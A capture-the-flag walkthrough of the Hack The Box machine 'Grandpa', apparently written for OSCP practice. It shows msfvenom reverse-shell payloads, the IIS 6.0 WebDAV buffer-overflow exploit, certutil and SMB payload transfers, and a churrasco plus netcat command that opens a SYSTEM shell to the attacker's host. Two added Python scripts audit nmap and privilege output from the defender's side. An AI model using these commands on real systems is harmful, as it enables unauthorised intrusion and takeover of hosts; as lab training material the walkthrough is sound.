In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
# Nmap 7.94 scan initiated Fri Oct 20 19:38:35 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/HTB/grandpa/results/10.10.10.14/scans/_full_tcp_nmap.txt -oX /home/kali/HTB/grandpa/results/10.10.10.14/scans/xml/_full_tcp_nmap.xml 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-20 19:38:42 EDT for 336s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 6.0
|_http-title: Under Construction
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan:
| Server Date: Fri, 20 Oct 2023 23:44:12 GMT
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 20 19:44:18 2023 -- 1 IP address (1 host up) scanned in 343.34 seconds
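The scan above is the whole story of this box from a defender's side: an end-of-life IIS 6.0 with WebDAV enabled and every state-changing method advertised. The script below is an added example (not part of the original write-up or of nmap) that parses nmap's normal-output script blocks and turns them into the findings a reviewer would raise; the sample input is the scan output shown above, and the list of end-of-life IIS versions is an assumption based on the support dates of the Windows releases they shipped with.

```python
"""Flag risky HTTP/WebDAV exposure from nmap -sC output (added example).

Parses the http-server-header, http-methods and http-webdav-scan blocks
that nmap prints for an HTTP port and reports: end-of-life server
version, WebDAV enabled, write methods advertised, TRACE enabled.
"""
import re

# Methods that change server state; any of these in the advertised set
# means WebDAV is enabled for that URL and the method set should be
# restricted (IIS: disable WebDAV or filter methods) if not needed.
WEBDAV_WRITE = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
WEBDAV_ANY = WEBDAV_WRITE | {"PROPFIND", "SEARCH"}

# Assumption: IIS versions whose host OS is out of support
# (6.0 = Windows Server 2003, extended support ended July 2015).
EOL_IIS = {"5.0", "5.1", "6.0", "7.0", "7.5"}

# Sample input: the nmap output from the scan above.
SAMPLE_NMAP = """\
80/tcp open http syn-ack Microsoft IIS httpd 6.0
|_http-title: Under Construction
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan:
| Server Date: Fri, 20 Oct 2023 23:44:12 GMT
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
"""


def _methods(field: str) -> set:
    """Split a method list that nmap prints either space- or comma-separated."""
    return {m for m in re.split(r"[,\s]+", field.strip()) if m}


def parse_nmap_http(report: str) -> dict:
    """Collect server header and every advertised method set from the report."""
    info = {"server": None, "supported": set(), "allowed": set(), "public_options": set()}
    for raw in report.splitlines():
        line = raw.lstrip("|_ ").strip()          # drop nmap's script-block prefix
        if line.startswith("http-server-header:"):
            info["server"] = line.split(":", 1)[1].strip()
        elif line.startswith("Server Type:") and not info["server"]:
            info["server"] = line.split(":", 1)[1].strip()
        elif line.startswith("Supported Methods:"):
            info["supported"] |= _methods(line.split(":", 1)[1])
        elif line.startswith("Allowed Methods:"):
            info["allowed"] |= _methods(line.split(":", 1)[1])
        elif line.startswith("Public Options:"):
            info["public_options"] |= _methods(line.split(":", 1)[1])
    return info


def assess(info: dict) -> list:
    """Turn the parsed report into an ordered list of findings."""
    findings = []
    advertised = info["supported"] | info["allowed"] | info["public_options"]
    server = info["server"] or ""
    m = re.match(r"Microsoft-IIS/(\d+\.\d+)", server)
    if m and m.group(1) in EOL_IIS:
        findings.append(f"end-of-life web server: {server}")
    if advertised & WEBDAV_ANY:
        findings.append("WebDAV enabled: " + ", ".join(sorted(advertised & WEBDAV_ANY)))
    if advertised & WEBDAV_WRITE:
        findings.append("write methods advertised: " + ", ".join(sorted(advertised & WEBDAV_WRITE)))
    if "TRACE" in advertised:
        findings.append("TRACE enabled (cross-site tracing)")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_nmap_http(SAMPLE_NMAP)):
        print("[!]", finding)
```

Advertised methods are what the server claims to accept, not proof they succeed unauthenticated (on this box the PUT attempts below fail), so the findings are a prioritisation list, not a verdict.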
Edit the hosts file:
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
10.10.11.152 timelapse.htb
10.10.10.52 htb.local mantis.htb.local
10.10.10.179 MEGACORP.LOCAL MULTIMASTER.MEGACORP.LOCAL
10.10.10.172 MEGABANK.LOCAL MONTEVERDE.MEGABANK.LOCAL
10.10.10.248 intelligence.htb dc.intelligence.htb
192.168.173.165 heist.offsec DC01.heist.offsec
10.10.10.15 granny
10.10.10.14 grandpa
Tried to PUT files into every directory, but all attempts failed.
Searchsploit results for IIS 6:
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt
A Google search for ScStoragePathFromUrl led to this GitHub repository: https://github.com/danigargu/explodingcan/tree/master
Downloaded the script.
The repository's usage instructions for creating the shellcode are:
$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode
Created the shellcode with our own LHOST and LPORT:
╰─$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=10.10.14.2 LPORT=443 >shellcode
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 770 (iteration=0)
x86/alpha_mixed chosen with final size 770
Payload size: 770 bytes
╭─kali@kali ~/HTB/grandpa
╰─$
Because this is Meterpreter shellcode, we set up a multi/handler listener.
╰─$ msfconsole
=[ metasploit v6.3.31-dev ]
+ -- --=[ 2346 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1390 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.2
LHOST => 10.10.14.2
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.2 yes The listen address (an interface may be specified)
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) >
We run the exploit and get a Meterpreter session. The script is written for Python 2 (it imports httplib, which Python 3 renamed to http.client), so the first attempt with python fails and it has to be run with python2.7:
╰─$ python explodingcan.py http://10.10.10.14 shellcode
Traceback (most recent call last):
File "/home/kali/HTB/grandpa/explodingcan.py", line 16, in <module>
import httplib
ModuleNotFoundError: No module named 'httplib'
╭─kali@kali ~/HTB/grandpa
╰─$ python2.7 explodingcan.py http://10.10.10.14 shellcode 1 ↵
[*] Using URL: http://10.10.10.14
[*] Server found: Microsoft-IIS/6.0
[*] Found IIS path size: 18
[*] Default IIS path: C:\Inetpub\wwwroot
[*] WebDAV request: OK
[*] Payload len: 2280
[*] Sending payload...
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.2:443
[*] Sending stage (175686 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.2:443 -> 10.10.10.14:1030) at 2023-10-20 21:12:00 -0400
meterpreter >
meterpreter > shell
Process 1176 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
systeminfo
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: GRANPA
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 0 Hours, 25 Minutes, 46 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 739 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,284 MB
Page File: In Use: 186 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
Checking for known vulnerabilities with Windows-Exploit-Suggester:
╭─kali@kali ~/HTB/grandpa/Windows-Exploit-Suggester ‹master●›
╰─$ python2.7 ./windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
Checking whoami, I see SeImpersonatePrivilege, so I will try Juicy Potato.
Created a reverse shell executable:
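The privilege spotted here is the whole privilege-escalation story on this box: the worker process runs as NETWORK SERVICE, whose token carries SeImpersonatePrivilege, and the churrasco run further down turns that into a SYSTEM token. As an added example (not from the original post, and not one of the tools it uses), the script below parses the output format of `whoami /priv` and reports the privileges an auditor would not want an IIS application-pool identity to hold. The sample output is constructed, and the list of high-risk privileges is the author's own selection.

```python
"""Audit a service account's token privileges from `whoami /priv` output
(added example). Run on a web host to check the identity the worker process
uses, so that impersonation-based escalation has nothing to work with.
"""
import re

# Assumption: privileges that commonly let a compromised process gain
# full control of the host; the first two are the impersonation pair.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate clients (token-theft escalation)",
    "SeAssignPrimaryTokenPrivilege": "replace a process-level token",
    "SeDebugPrivilege": "open any process",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of objects",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# Constructed sample in the format printed by `whoami /priv`; this is
# not output captured from the box in the write-up.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeAuditPrivilege                Generate security audits                  Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
"""

# One privilege row: name, free-text description, then the state column.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privileges(text: str) -> dict:
    """Return {privilege_name: state} for every privilege row in the output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def risky_privileges(privs: dict) -> list:
    """High-risk privileges present in the token, as (name, state, why).

    A 'Disabled' privilege is still reported: it is merely not enabled yet,
    and the process can enable it itself with AdjustTokenPrivileges, so
    removing it from the token is the only real mitigation.
    """
    return sorted(
        (name, state, HIGH_RISK[name])
        for name, state in privs.items()
        if name in HIGH_RISK
    )


if __name__ == "__main__":
    for name, state, why in risky_privileges(parse_privileges(SAMPLE_WHOAMI_PRIV)):
        print(f"[!] {name} ({state}): {why}")
```

The practical fix on a web server is to run application pools under an identity whose token does not carry the impersonation privileges at all, rather than relying on them being disabled.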
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 -a x86 --platform windows LPORT=443 EXITFUNC=thread -f exe -o shell.exe
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
╭─kali@kali ~/HTB/grandpa/Windows-Exploit-Suggester ‹master●›
Serve and upload the two files.
╭─kali@kali ~/HTB/grandpa
╰─$ ls
41738.py fpcount.exe shellcode shellcode_3 test.gif
8765.php JuicyPotato.exe shellcode_1 shellcode.bin test.txt
explodingcan.py results shellcode_2 shell.exe Windows-Exploit-Suggester
╭─kali@kali ~/HTB/grandpa
╰─$ serve 900
Starting HTTP server on port 900...
====================================
certutil -urlcache -f http://10.10.14.2:900/file_to_download.txt C:\path\where\you\lile.txt
Invoke-WebRequest -Uri http://10.10.14.2:900/file_to_download.txt -OutFile C:\path\lile.txt
====================================
Serving HTTP on 0.0.0.0 port 900 (http://0.0.0.0:900/) ...
certutil -urlcache -f http://10.10.14.2:80/shell.exe C:\wmpub\shell.exe
certutil -urlcache -f http://10.10.14.2:80/shell.exe C:\Inetpub\wwwroot\shell.exe
certutil -urlcache -f http://10.10.14.2:900/JuicyPotato.exe C:\temp\JuicyPotato.exe
certutil fails:
C:\Inetpub\wwwroot>certutil -urlcache -f http://10.10.14.2:80/shell.exe C:\Inetpub\wwwroot\shell.exe
certutil -urlcache -f http://10.10.14.2:80/shell.exe C:\Inetpub\wwwroot\shell.exe
CertUtil: -URLCache command FAILED: 0x80070057 (WIN32: 87)
CertUtil: The parameter is incorrect.
We'll try SMB instead. Serve the directory with Impacket's smbserver.py:
╭─kali@kali /usr/share/doc/python3-impacket/examples
╰─$ ./smbserver.py -smb2support myshare /home/kali/HTB/grandpa
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
copy[*] Incoming connection (10.10.10.14,1032)
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/smbserver.py", line 4439, in processRequest
respCommands, respPackets, errorCode = self.__smb2Commands[smb2.SMB2_NEGOTIATE](
We copy the shell and JuicyPotato over SMB:
copy \\10.10.14.2\myshare\shell.exe /Y
copy \\10.10.14.2\myshare\JuicyPotato.exe /Y
C:\temp>copy \\10.10.14.2\myshare\shell.exe /Y
copy \\10.10.14.2\myshare\shell.exe /Y
1 file(s) copied.
and
C:\temp>copy \\10.10.14.2\myshare\JuicyPotato.exe /Y
copy \\10.10.14.2\myshare\JuicyPotato.exe /Y
1 file(s) copied.
copy \\10.10.14.2\myshare\Juicy.Potato.x86.exe /Y
We listen on port 443 and run Juicy Potato:
.\Juicy.Potato.x86.exe -l 80 -p C:\temp\shell1.exe -t *
.\Juicy.Potato.x86.exe -t * -p .\shell1.exe -l 80 -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}
This kept failing.
We'll try the same exploit we used on Granny (churrasco).
Copy churrasco, nc and the shell to the temp folder.
Copy the files to grandpa:
╭─kali@kali ~/HTB/granny
╰─$ ls
35474.py nc.exe reverse86.exe.gif shell86.aspx.txt
64.dll results run.bat sys.txt
churrasco.exe reverse64.exe run.bat.txt test.gif
churrasco.exe.1 reverse64.exe.gif shell64.aspx test.txt
ferox-http_10_10_10_15:80_-1697779932.state reverse86.exe shell86.aspx Windows-Exploit-Suggester
╭─kali@kali ~/HTB/granny
╰─$ cp churrasco.exe ~/HTB/grandpa
╭─kali@kali ~/HTB/granny
╰─$ cp nc.exe ~/HTB/grandpa
╭─kali@kali ~/HTB/granny
╰─$
Copy the files to grandpa:
copy \\10.10.14.2\myshare\nc.exe /Y
copy \\10.10.14.2\myshare\churrasco.exe /Y
C:\>cd temp
cd temp
C:\temp>copy \\10.10.14.2\myshare\nc.exe /Y
copy \\10.10.14.2\myshare\nc.exe /Y
1 file(s) copied.
C:\temp>copy \\10.10.14.2\myshare\churrasco.exe /Y
copy \\10.10.14.2\myshare\churrasco.exe /Y
1 file(s) copied.
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\temp
10/21/2023 06:13 AM <DIR> .
10/21/2023 06:13 AM <DIR> ..
10/21/2023 06:12 AM 31,232 churrasco.exe
10/21/2023 05:44 AM 263,680 Juicy.Potato.x86.exe
10/21/2023 04:49 AM 347,648 JuicyPotato.exe
10/21/2023 06:12 AM 59,392 nc.exe
10/21/2023 04:50 AM 73,802 shell.exe
10/21/2023 05:58 AM 73,802 shell1.exe
10/21/2023 04:56 AM 19 test.txt
7 File(s) 849,575 bytes
2 Dir(s) 1,293,881,344 bytes free
C:\temp>
Command:
.\churrasco.exe -d "C:\temp\nc.exe 10.10.14.2 80 -e cmd.exe"
C:\temp>.\churrasco.exe -d "C:\temp\nc.exe 10.10.14.2 80 -e cmd.exe"
.\churrasco.exe -d "C:\temp\nc.exe 10.10.14.2 80 -e cmd.exe"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x734
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x72c
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
C:\temp>
We get a SYSTEM shell on our listener:
╭─kali@kali ~/HTB/grandpa
╰─$ nc -nlvp 80 1 ↵
listening on [any] 80 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.14] 1058
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\DOCUME~1\NETWOR~1\LOCALS~1\Temp>whoami
whoami
nt authority\system
C:\DOCUME~1\NETWOR~1\LOCALS~1\Temp>